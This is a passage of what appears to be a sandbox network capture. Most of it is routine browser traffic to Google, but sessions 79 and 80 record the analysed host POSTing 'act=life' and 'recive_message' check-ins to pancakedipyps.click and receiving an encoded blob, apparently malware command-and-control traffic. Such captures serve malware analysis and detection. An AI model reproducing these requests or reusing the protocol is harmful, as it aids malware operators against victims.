2024-12-22 01:21:05 UTC	381	IN	Data Raw: 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38 Data Ascii: s\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8
2024-12-22 01:21:05 UTC	188	IN	Data Raw: 62 36 0d 0a 20 36 39 74 2d 36 39 20 32 38 48 32 30 39 5a 6d 32 32 31 2d 36 36 30 76 31 31 30 71 30 20 32 36 2d 37 2e 35 20 35 30 2e 35 54 34 30 31 2d 35 37 33 4c 32 37 36 2d 33 38 35 71 2d 36 20 38 2d 38 2e 35 20 31 36 74 2d 32 2e 35 20 31 36 71 30 20 32 33 20 31 37 20 33 39 2e 35 74 34 32 20 31 36 2e 35 71 32 38 20 30 20 35 36 2d 31 32 74 38 30 2d 34 37 71 36 39 2d 34 35 20 31 30 33 2e 35 2d 36 32 2e 35 54 36 33 33 2d 34 34 33 71 34 2d 31 20 35 2e 35 2d 34 2e 35 74 2d 2e 35 2d 37 2e 35 6c 2d 37 38 2d 31 31 37 71 2d 31 35 2d 32 31 2d 32 32 2e 35 2d 34 0d 0a Data Ascii: b6 69t-69 28H209Zm221-660v110q0 26-7.5 50.5T401-573L276-385q-6 8-8.5 16t-2.5 16q0 23 17 39.5t42 16.5q28 0 56-12t80-47q69-45 103.5-62.5T633-443q4-1 5.5-4.5t-.5-7.5l-78-117q-15-21-22.5-4
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 36 74 2d 37 2e 35 2d 35 32 76 2d 31 31 30 48 34 33 30 5a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 49 20 67 62 5f 62 64 20 67 62 5f 5a 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 5c 75 30 30 33 64 5c 22 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 77 61 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 Data Ascii: 80006t-7.5-52v-110H430Z\"\u003e\u003c\/path\u003e \u003c\/svg\u003e \u003c\/a\u003e \u003c\/div\u003e \u003c\/div\u003e \u003cdiv class\u003d\"gb_I gb_bd gb_Z\" data-ogsr-fb\u003d\"true\" data-ogsr-alt\u003d\"\" id\u003d\"gbwa\"\u003e\u003cdiv class\u00
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 20 67 62 5f 6f 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 Data Ascii: v\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a gb_od\"\u003e\u003c\/div\u003e\u003c\/header\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cd
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 Data Ascii: achEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._D
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 Data Ascii: uctor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Od\u003dfuncti
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 Data Ascii: typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b)

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	50484	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:04 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:21:05 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:21:04 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:21:05 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-22 01:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	50485	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:04 UTC	369	OUT	GET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	50480	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:04 UTC	384	OUT	GET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:21:05 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:21:04 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:21:05 UTC	137	IN	Data Raw: 38 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6c 6f 67 22 3a 7b 22 65 6e 63 6f 64 65 64 5f 65 69 22 3a 22 67 47 6c 6e 5a 38 79 73 4d 36 61 4f 37 4e 59 50 75 6f 44 70 6f 41 34 22 2c 22 74 61 72 67 65 74 5f 75 72 6c 5f 70 61 72 61 6d 73 22 3a 22 76 65 64 5c 75 30 30 33 64 32 61 68 55 4b 45 77 6a 4d 37 4f 69 4d 6d 37 71 4b 41 78 55 6d 42 39 73 45 48 54 70 41 47 75 51 51 50 58 6f 45 43 41 41 51 41 41 22 7d 7d 0d 0a Data Ascii: 83)]}'{"ddllog":{"encoded_ei":"gGlnZ8ysM6aO7NYPuoDpoA4","target_url_params":"ved\u003d2ahUKEwjM7OiMm7qKAxUmB9sEHTpAGuQQPXoECAAQAA"}}
2024-12-22 01:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	50517	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2024-12-22 01:21:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:21:35 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hbf62g78q7011v8jfp4vqn42ba; expires=Wed, 16 Apr 2025 19:08:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi1N3BPAygEMNWSWcTfByDkoQZZ3I7b9abzozMODUwgoLNKxj6r%2BDm55g0%2FVh%2F2W4KILfZXvpFb3aQuvwhqd%2B7W9DEeu1kwuiTTJ2H8tsXgwR3bnHw9dSXy6YP9lF0AjzSacr%2FGS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4bc33fe17ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2014&rtt_var=766&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1449851&cwnd=239&unsent_bytes=0&cid=7acc13fe31909a51&ts=772&x=0"
2024-12-22 01:21:35 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:21:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	50520	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:36 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: pancakedipyps.click
2024-12-22 01:21:36 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
2024-12-22 01:21:37 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nicnods9p0ehou1rqcpbu821df; expires=Wed, 16 Apr 2025 19:08:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omIES10HPzaUEB6hn8AaGtaOJWm1OY7IrELpQHJ1DIqIj2%2BSgKGhjOroKIDe3q2co9gyea8Jqgvbvi9d8TqjZIc9%2BhQR6bfSvzx9q%2FxVl%2BKjxJh4T8ZrLqPDYcvosZINJqoRfhkS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4bcfbf8542ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1601&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1736028&cwnd=183&unsent_bytes=0&cid=744950d3b9fe021f&ts=786&x=0"
2024-12-22 01:21:37 UTC	242	IN	Data Raw: 34 36 62 0d 0a 4c 2f 4a 68 42 56 48 37 76 6c 51 4d 4a 4c 52 4c 59 76 75 31 49 41 6f 4e 64 69 62 51 67 30 72 52 54 53 74 55 67 6e 5a 6c 73 4c 56 55 30 42 63 6e 61 38 2b 53 64 6e 39 42 6c 6e 45 57 69 63 42 46 4a 69 38 58 51 76 4b 35 4c 4c 41 68 57 44 47 75 56 42 50 64 6c 78 57 55 41 47 6b 69 6e 70 4a 32 61 56 79 57 63 54 6d 41 6c 30 56 6b 4c 30 77 45 74 65 6b 6f 73 43 46 4a 4e 65 6b 5a 46 64 7a 57 52 35 34 47 62 54 53 59 32 6a 56 67 53 64 45 75 42 35 72 66 54 6d 4e 67 48 6b 76 79 72 32 69 30 4e 77 6c 75 6f 44 73 41 78 4e 52 69 6b 78 4a 75 63 34 61 53 4c 79 35 42 32 6d 6c 59 32 64 52 46 61 47 45 51 51 72 76 72 49 72 6b 70 53 44 44 6f 42 67 7a 57 33 55 65 51 42 57 77 2b 6b 63 34 34 61 6b 37 61 4b 41 32 61 6c 77 77 6f 61 Data Ascii: 46bL/JhBVH7vlQMJLRLYvu1IAoNdibQg0rRTStUgnZlsLVU0Bcna8+Sdn9BlnEWicBFJi8XQvK5LLAhWDGuVBPdlxWUAGkinpJ2aVyWcTmAl0VkL0wEtekosCFJNekZFdzWR54GbTSY2jVgSdEuB5rfTmNgHkvyr2i0NwluoDsAxNRikxJuc4aSLy5B2mlY2dRFaGEQQrvrIrkpSDDoBgzW3UeQBWw+kc44ak7aKA2alwwoa
2024-12-22 01:21:37 UTC	896	IN	Data Raw: 41 77 45 36 71 46 37 67 53 78 59 4a 2f 55 5a 46 39 53 58 55 74 34 61 4a 7a 53 56 6e 47 34 75 54 74 6f 6e 42 5a 72 59 52 57 6c 76 42 6b 75 79 34 69 43 37 4b 30 4d 35 37 78 73 4a 32 4e 42 46 6d 51 52 6f 4e 4a 48 61 4f 57 30 47 6d 47 6b 48 67 5a 63 61 4b 45 38 45 52 37 48 31 4a 61 4a 76 56 6e 6a 35 56 41 44 65 6c 78 58 51 42 57 6b 79 6c 4e 77 6b 5a 6b 33 64 4c 42 4b 53 33 6b 39 6c 62 78 6c 4f 76 65 49 6f 74 43 56 44 4f 65 6f 51 43 74 2f 52 54 5a 42 44 4b 58 4f 65 78 48 59 32 42 76 55 73 45 4a 37 62 56 43 70 56 56 46 76 38 2b 47 69 30 49 77 6c 75 6f 42 77 43 30 64 52 47 6e 77 42 76 4f 49 76 63 4a 47 68 4c 30 7a 73 47 6e 4e 6c 49 61 33 30 65 53 72 54 69 49 62 67 6d 54 44 48 6b 56 45 6d 53 30 46 58 51 57 79 63 53 6c 4e 63 36 5a 46 48 57 61 52 2f 58 7a 67 4a 76 Data Ascii: AwE6qF7gSxYJ/UZF9SXUt4aJzSVnG4uTtonBZrYRWlvBkuy4iC7K0M57xsJ2NBFmQRoNJHaOW0GmGkHgZcaKE8ER7H1JaJvVnj5VADelxXQBWkylNwkZk3dLBKS3k9lbxlOveIotCVDOeoQCt/RTZBDKXOexHY2BvUsEJ7bVCpVVFv8+Gi0IwluoBwC0dRGnwBvOIvcJGhL0zsGnNlIa30eSrTiIbgmTDHkVEmS0FXQWycSlNc6ZFHWaR/XzgJv
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 34 34 62 31 0d 0a 6d 59 52 4e 53 38 76 35 6d 71 6d 39 4f 4f 71 42 4d 52 39 33 59 51 70 67 44 5a 6a 65 55 32 44 64 6a 53 74 38 71 44 4a 58 66 54 32 52 72 47 30 79 36 34 69 43 68 49 55 63 77 35 68 51 43 6b 70 6b 4e 6c 78 73 6e 61 39 6e 34 4f 48 6c 53 33 57 73 31 6d 74 6c 4d 62 33 6c 55 57 2f 7a 34 61 4c 51 6a 43 57 36 67 47 67 72 5a 32 30 71 5a 41 6d 51 7a 6b 39 49 35 5a 45 37 65 4b 51 32 59 33 45 70 75 59 68 39 4c 76 65 59 67 73 43 4e 4d 4f 2b 4e 55 53 5a 4c 51 56 64 42 62 4a 78 61 58 33 79 64 2f 42 4f 4d 71 44 70 66 51 56 43 68 77 57 6c 33 79 35 69 54 7a 64 77 6b 38 35 78 4d 44 33 39 31 4f 6c 41 64 71 50 4a 44 56 50 33 78 4d 32 69 63 53 6c 4e 31 48 5a 6d 4d 52 53 37 4c 67 4b 62 30 6c 51 6e 61 75 56 41 44 4b 6c 78 58 51 4c 47 6f 6a 69 39 59 39 66 77 54 6a Data Ascii: 44b1mYRNS8v5mqm9OOqBMR93YQpgDZjeU2DdjSt8qDJXfT2RrG0y64iChIUcw5hQCkpkNlxsna9n4OHlS3Ws1mtlMb3lUW/z4aLQjCW6gGgrZ20qZAmQzk9I5ZE7eKQ2Y3EpuYh9LveYgsCNMO+NUSZLQVdBbJxaX3yd/BOMqDpfQVChwWl3y5iTzdwk85xMD391OlAdqPJDVP3xM2icSlN1HZmMRS7LgKb0lQnauVADKlxXQLGoji9Y9fwTj
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 63 61 4b 45 41 58 55 72 69 68 4e 2f 30 32 43 54 48 73 56 46 2b 53 33 55 47 55 41 47 73 36 6c 64 45 33 61 6b 48 62 4c 51 43 66 30 55 64 70 5a 42 78 49 76 65 73 6b 74 79 4e 41 4d 4f 77 58 42 4e 53 58 41 39 41 45 66 33 50 42 6e 42 64 6a 54 64 6f 70 41 34 6a 51 41 69 59 76 47 6b 4b 79 6f 58 43 6c 50 31 34 78 2f 31 6f 65 6b 74 42 42 30 46 73 6e 4f 59 76 5a 4f 47 70 4d 30 79 30 4d 6b 39 64 48 65 6d 63 53 51 37 37 70 4c 62 77 70 54 44 76 6e 48 77 54 41 78 55 36 55 44 57 74 7a 31 35 77 78 64 67 61 4f 61 53 57 4f 31 46 4a 75 62 46 52 62 2f 50 68 6f 74 43 4d 4a 62 71 41 55 43 64 37 63 53 70 73 49 59 7a 65 5a 30 54 31 67 53 4e 38 6c 43 4a 58 51 55 47 56 71 48 45 36 37 35 43 53 2b 4c 46 73 31 34 56 52 4a 6b 74 42 56 30 46 73 6e 46 4b 72 72 46 53 35 5a 6d 44 42 41 6e Data Ascii: caKEAXUrihN/02CTHsVF+S3UGUAGs6ldE3akHbLQCf0UdpZBxIvesktyNAMOwXBNSXA9AEf3PBnBdjTdopA4jQAiYvGkKyoXClP14x/1oektBB0FsnOYvZOGpM0y0Mk9dHemcSQ77pLbwpTDvnHwTAxU6UDWtz15wxdgaOaSWO1FJubFRb/PhotCMJbqAUCd7cSpsIYzeZ0T1gSN8lCJXQUGVqHE675CS+LFs14VRJktBV0FsnFKrrFS5ZmDBAn
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 76 4f 45 65 39 36 6d 69 73 59 56 42 32 35 78 68 48 69 70 64 4b 6d 41 74 70 4d 4a 2f 58 4f 6d 4a 48 33 79 38 46 6b 64 42 4e 62 32 59 54 52 4c 54 7a 4c 37 34 6d 53 54 33 70 48 67 50 54 33 41 33 65 51 32 41 72 32 59 52 32 58 45 48 41 4f 51 50 5a 79 41 78 78 4c 78 4e 49 38 72 6c 6f 76 6a 31 49 4d 2f 49 51 43 4e 6e 46 52 70 59 44 59 69 47 65 30 44 78 68 52 64 34 6b 41 35 48 46 51 6d 56 76 42 6c 61 30 36 69 62 7a 59 51 6b 78 2b 46 52 66 6b 75 5a 61 6d 30 4e 34 66 59 43 63 4d 57 49 47 6a 6d 6b 44 6b 39 70 4d 65 6d 73 53 54 37 48 76 49 4c 59 6e 54 54 7a 74 47 77 7a 59 33 6b 57 51 44 47 49 37 6b 74 6f 34 62 30 44 61 4a 45 44 58 6c 30 56 77 4c 30 77 45 6c 66 73 6c 74 54 68 59 41 2b 63 55 56 70 4c 49 41 34 6c 44 59 44 2f 5a 68 48 5a 6a 53 74 77 6b 42 5a 33 66 52 57 Data Ascii: vOEe96misYVB25xhHipdKmAtpMJ/XOmJH3y8FkdBNb2YTRLTzL74mST3pHgPT3A3eQ2Ar2YR2XEHAOQPZyAxxLxNI8rlovj1IM/IQCNnFRpYDYiGe0DxhRd4kA5HFQmVvBla06ibzYQkx+FRfkuZam0N4fYCcMWIGjmkDk9pMemsST7HvILYnTTztGwzY3kWQDGI7kto4b0DaJEDXl0VwL0wElfsltThYA+cUVpLIA4lDYD/ZhHZjStwkBZ3fRW
